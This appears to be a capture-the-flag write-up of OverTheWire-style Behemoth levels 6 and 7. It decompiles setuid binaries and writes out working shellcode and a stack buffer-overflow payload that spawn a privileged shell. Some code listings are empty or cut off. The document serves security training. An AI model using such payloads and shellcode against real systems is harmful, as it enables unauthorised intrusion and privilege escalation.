This challenge was more of a reverse engineering exercise, but it is good practice for developing the skill of understanding the functionality of a binary.
After logging in as the behemoth6 user and executing the behemoth6 binary, the following output is seen:
behemoth6@behemoth:/behemoth$ ./behemoth6
Furthermore, performing the ls command on the /behemoth directory reveals another interesting file possibly related to behemoth6:
behemoth6@behemoth:/behemoth$ ls
That file is called behemoth6_reader, and it might be used by the behemoth6 binary. After downloading both binaries onto the attack box, they can be analyzed with the help of Ghidra.
Ghidra translated the assembly code found for each binary into the following:
The code on the left was produced from the behemoth6 binary, while the code on the right is from behemoth6_reader. Looking at the code for the behemoth6_reader program, a file named shellcode.txt is expected. However, the contents of this file are not printed out anywhere. If shellcode.txt exists, a small sanitization check is performed against its contents: if the byte 0x0b is present anywhere in the file, the program immediately exits.
In short, the program is executing the contents of the shellcode.txt file as machine code. Therefore, shellcode will get executed by the binary. This, however, will not directly result in a privileged shell due to the fact that the SETUID bit is not enabled on the behemoth6_reader binary. Rather, the behemoth6 binary has the SETUID bit, and its interaction with the behemoth6_reader will determine the significance of the shellcode.
Looking at the code for behemoth6, observe that behemoth6_reader is launched with the popen function in read mode, and the resulting stream is stored in the __stream variable. Data read from this stream is placed in __s1, which is compared against the string ‘HelloKitty’ with the strcmp function. If they match, a /bin/sh shell is spawned.
The output of the popen function is determined by the behemoth6_reader. Consequently, if the behemoth6_reader executes shellcode that makes it print out ‘HelloKitty’, then a shell will be returned. There are already shellcodes online that perform this operation, and the following shellcode was used[9]:
char code[] =
The code above prints whatever string is appended after it (the string must be appended as raw bytes). This code, followed by the bytes of HelloKitty, will result in a successful string comparison. To facilitate the conversion between ASCII and hex-escaped bytes, a conversion table[10] was used.
Ascii:
HelloKitty
Shellcode:
\x48\x65\x6c\x6c\x6f\x4b\x69\x74\x74\x79
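Both the conversion table lookup and the 0x0b check that the payload has to survive can be expressed in a few lines of Python. A sketch with illustrative helper names:

```python
def to_escapes(text):
    """ASCII text -> the \\xNN escapes used inside the python -c one-liners."""
    return "".join(f"\\x{b:02x}" for b in text.encode("ascii"))


def passes_reader_filter(data):
    """behemoth6_reader (per the decompiled code) exits if any 0x0b byte is present.

    0x0b is 11, the execve system call number on 32-bit Linux, so the check
    crudely blocks the usual `mov al, 0xb; int 0x80` shellcode.
    """
    return 0x0b not in data


print(to_escapes("HelloKitty"))   # \x48\x65\x6c\x6c\x6f\x4b\x69\x74\x74\x79
```

The write-style shellcode used for shellcode.txt only uses system calls 4 (write) and 1 (exit), so it contains no 0x0b byte and passes the filter.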
After creating a directory in /tmp (so as to be able to create files), the following bytes were written to shellcode.txt:
behemoth6@behemoth:/tmp/behemoth6$ python -c "print '\xe9\x1e\x00\x00\x00\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0f\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdd\xff\xff\xff' +'\x48\x65\x6c\x6c\x6f\x4b\x69\x74\x74\x79'" > shellcode.txt
Now, when the behemoth6 binary is executed, it launches behemoth6_reader via popen, which executes the shellcode in shellcode.txt and prints HelloKitty. The strcmp function therefore reports a match, and a /bin/sh shell is returned:
behemoth6@behemoth:/tmp/behemoth6$ /behemoth/behemoth6
After successfully exploiting the behemoth6 binary, we are left with the final challenge of exploiting the behemoth7 binary.
Before analyzing the binary with tools such as GDB and Ghidra, it is advisable to first execute it and observe its behavior.
Upon executing the binary, nothing conspicuous occurs. The binary immediately exits after execution without printing anything to stdout.
After downloading the binary onto the attack box, the binary can be analyzed with the help of Ghidra. Using Ghidra, the assembly code of the binary was converted to the following code:
undefined4 main(int param_1,int param_2,int param_3)
At the very top of the code, it can be seen that the main function takes three parameters. These most likely correspond to argc, argv, and envp[11]. Among the variable declarations at the top of main is local_210, which has 512 bytes allocated to it. Toward the middle of main is a while loop inside an if statement. Inside the while loop is an if statement which, when true, prints the following:
fprintf(stderr,"Non-%s chars found in string, possible shellcode!\n","alpha");
Therefore, there is likely a filter on non-alphanumeric characters[12], which would restrict the shellcode that can be used. However, the code does not appear to perform any boundary checks. It should therefore be possible to overwrite the saved return address and thus control EIP. This can be verified by passing a large number of bytes to the program:
behemoth7@behemoth:/behemoth$ gdb -q /behemoth/behemoth7
The return address was successfully overwritten, as can be seen from the value of the instruction pointer (0x41414141), which is AAAA in ASCII. Therefore, the shellcode used to exploit this binary does not have to consist of alphanumeric characters.
The payload will consist of the necessary amount of bytes to equal the EIP offset, followed by the address of the shellcode, after which the NOP sled will be declared which precedes the shellcode.
To begin the construction of the exploit, the EIP offset must first be calculated:
pwndbg> r $(cyclic 1000)
The offset was calculated as 528 bytes, and as such 528 bytes of junk must first be inputted into the binary before the EIP register can be controlled.
The next step is to determine the address of the shellcode[13]. This can easily be analyzed within GDB:
(gdb) r $(python -c "print 'A'*528+'BBBB'+'A'*112+'\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'") |
Note that the EIP register was successfully controlled to be 0x42424242 (equivalent to BBBB)
The beginning of the shellcode can be found by examining the memory around the stack pointer:
(gdb) x/100x $esp-200
The filler placed after the overwritten return address begins at 0xffffd2e8 + 8, which is 0xffffd2f0. Following the 112 filler bytes is the shellcode at 0xffffd358 + 8, which is 0xffffd360. Therefore, the return address should be overwritten with 0xffffd360.
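The address arithmetic and the little-endian encoding of the return address can be double-checked with a few lines of Python, using the values read from the dump:

```python
import struct

filler_start = 0xffffd2f0   # first filler byte after the overwritten return address
filler_len = 112            # 'A' * 112, a multiple of 4
shellcode_addr = filler_start + filler_len
ret_bytes = struct.pack("<I", shellcode_addr)   # bytes to place at offset 528

print(hex(shellcode_addr), ret_bytes.hex())     # 0xffffd360 60d3ffff
```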
With the knowledge of the EIP offset and the shellcode address, the final payload can now be constructed:
'A'*528 + '\x60\xd3\xff\xff' + 'A'*112 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'
It is important to note that the filler length of 112 A’s was chosen so that no 0x41 bytes spill into the memory occupied by the shellcode. The value 112 itself is not required. However, the length should be a multiple of 4 so that the shellcode begins on a 4-byte boundary and does not share a word with filler bytes.
The payload works in GDB as can be seen from /bin/bash being executed:
(gdb) r $(python -c "print 'A'*528+'\x60\xd3\xff\xff'+'A'*112+'\x6a\x0b\x58\x99\x52\x66
When trying this payload outside of GDB, a shell is successfully popped, and the final local user is compromised:
behemoth7@behemoth:/behemoth$ /behemoth/behemoth7 $(python -c "print 'A'*528+'\x60\xd
Every binary tested was successfully exploited. Several binaries that should not have been exploitable in practice turned out to be vulnerable because they invoke sensitive system commands (in particular /bin/sh). This resulted in the horizontal privilege escalation in Behemoth 0 and Behemoth 6.
Each binary suffered from different vulnerabilities, ranging from format string bugs to buffer overflows and privilege escalation via the PATH environment variable. The following remediations should be strongly considered: